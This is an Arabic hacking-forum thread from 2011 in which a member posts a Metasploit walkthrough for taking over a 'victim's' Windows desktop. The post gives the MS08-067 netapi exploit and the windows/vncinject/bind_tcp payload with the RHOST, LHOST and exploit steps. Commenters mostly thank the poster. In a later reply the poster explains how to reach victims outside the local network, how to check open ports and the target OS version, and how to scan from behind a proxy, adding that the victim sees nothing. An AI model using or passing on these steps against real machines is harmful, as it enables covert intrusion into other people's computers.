الإتصال بسطح مكتب الضحية

VIURIS.SA · 03-19-2011, 04:30 AM

السلام عليكم ورحمة الله وبركاته

حياكم الله اخوتي الأعزاء
شرحي هو عن ثغرة رائعة جدا في نظري
على الرغم من كونها قديمة
لكنها مميزة
وهي

كود PHP:

    windows/smb/ms_08_067_netapi

طبعا بعد فتح الميتا سبلويت واختيار الثغرة
نقوم بكتابة الأمر التالي

كود PHP:

   show options

ومثل ما انتم شايفين يعطينا المتطلبات لهذه الثغرة
يعني البورت اللي لازم يكون مفتوح عند الضحية

تمام
نقوم يتحديد الآيبي حق الضحية من الأمر

كود PHP:

    set RHOST

و بتحديد البايلود المستخدم في هذه العملية
هذا البايلود يتيح التحكم بسطح مكتب الضحية

كود PHP:

   set PAYLOAD windows/vncinject/bind_tcp

العملية مطبقة في شبكة داخلية لذلك نأخذ الآيبي الداخلي لجهازنا من الأمر

كود PHP:

    set LHOST

الآن نشيك على كل شي من الأمر

كود PHP:

   show options

الآن كل شي تمام
نطبق بلأمر exploit

]
الحمدلله تم الإتصال
وهنا قطعت علشان طلع سطح المكتب حق جهازي :na:

أتمنى أكون قدمت المفيد لكم اخواني

الشرح إهداء لأخي القدير ALQAYSAR الذي استفدت منه كثيرا

المصدر: :: vBspiders Professional Network ::

hgYjwhg fs'p l;jf hgqpdm

Mr.NoD · 03-19-2011, 04:42 AM

يآسلآم علي مبدعين البـآك ترآك ،،
تسلم اديك عالشرح ..
يعطيك العافية ، بانتظار الجديد ،،

VIURIS.SA · 03-19-2011, 05:00 AM

والله أتشرف بمرورك العطر أستاذ Mr.NoD

وتعبت كثير والنت عندي ضعيف
لكن التعب راح مع رفع الموضوع

Cyber Cool · 03-19-2011, 05:10 AM

اولا : الــف شكــر لك حبيبي على الاهـــدآء التى لاتسعني الكلمات لشكرك

وثانيا : ابي اشوف ابدعاتك في المنتدى وتشد حيلك واي مشكلة توقف معاك

انا مستعد عطني خبـــر

ودمت بود ياغالي

VIURIS.SA · 03-19-2011, 05:21 AM

حياك الله مشرفنا الغالي
وماتقصر والله كفيت ووفيت ورايتك خضرا وعساك عالقوة دوووم إن شاء الله

Hαcĸer'ѕ Kιɴɢ · 03-19-2011, 05:43 AM

بارك الله فيك
واصل ابداعاتك

Mido-9 · 03-19-2011, 07:18 AM

ربي يبارك فى عمرك يامبدع

جزاك الله ألف خير

سيتم التجربة الأن إن شاء الله

ولي عوده إن شاء الله يامبدع

VIURIS.SA · 03-19-2011, 02:18 PM

اقتباس


	بارك الله فيك واصل ابداعاتك

الله يبارك بيك
مشكور على المرور العطر

VIURIS.SA · 03-19-2011, 02:24 PM

اقتباس


	ربي يبارك فى عمرك يامبدع جزاك الله ألف خير سيتم التجربة الأن إن شاء الله ولي عوده إن شاء الله يامبدع

الله يجزاك خير وكل اللي ردوا
اعطيتوني دافع كبير
لا عدمتكم

wael272 · 03-19-2011, 03:17 PM

مشكور

mozymac · 03-24-2011, 07:07 PM

بارك الله فيك ومشكور على المجهود الرائع

زيــزو · 03-27-2011, 07:43 AM

شكرااااااااحبيبي

leopardgold · 04-16-2011, 07:08 AM

السلام عليكم ورحمة الله وبركاته

أخىVIURIS.SA لو تكرمت بعض الإستفسارات

1- هل ينبغى أن يكون الضحيه أونلين .. فاتح جهازه ومتصل بالإنترنت وقت الأختراق...
2- هل نفس الشئ فعال لو حاولنا إختراق ضحيه فى دوله أخرى أو مكان أخر خارج الشبكه الداخليه...
3- وقت الإختراق والدخول إلى سطح مكتب الضحيه بالفعل أو جهازه بالكامل((هل يشاهد الضحيه ما نقوم بفتحه أو نسخه أو التعديل عليه بجهازه وقت الإختراق))هل يشاهد حركة الماوس وفتح المجلدات بجهازه...

لك منى خالص وأطيب تحيه وإحترام

فى أمان الله ورعايته أخــىVIURIS.SA

leopardgold · 04-16-2011, 07:28 AM

اقتباس

المشاركة الأصلية كتبت بواسطة VIURIS.SA


	كود PHP: `show options` ومثل ما انتم شايفين يعطينا المتطلبات لهذه الثغرة يعني البورت اللي لازم يكون مفتوح عند الضحية

أخى إستفسار أخرلو تكرمت :

كيف نتأكد أنو البورت المطلوب مفتوح لدى الضحيه..؟؟
وإذا ما كان مفتوح .. هل يوجد حل لتخطى هذه المشكله..؟؟

شكراً على سعة صدرك أخى الكريم

VIURIS.SA · 04-16-2011, 11:24 PM

اهلا وسهلا حياك الله أخي الغالي
أنا نسيت الموضوع أخي الغالي خخخ
المهم
1-ضروري يكون الضحية متصل وإلا كيف يكون اختراق !!!!!
2-الشروط لازم تتوافق في مسألة الإختراق الخارجي واستخدام الباك تراك يسهل عليك الموضوع كثير بحيث يتبقى عليك فتح البورت الخاص بالتبليغ في الراوتر
3-الضحية لا يرى أي شي تعمله
4-لكشف البورت اذا مفتوح عند الضحية لازم تفحص المنافذ المفتوحة عنده
وأيضا لازم تتأكد من نظام التشغيل بتاع الضحية
ومن توافق الثغرة والإصدار
الثغرة المستخدمة شغالة على ويندوز xp service back 2
والأفضل انك تفحص من وراء بروكسي
تدريجيا أخي الغالي ومع التعليم المستمر ستصبح محترف إن شاء الله
تحياتي لك

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

الإتصال بسطح مكتب الضحية

MetaSploit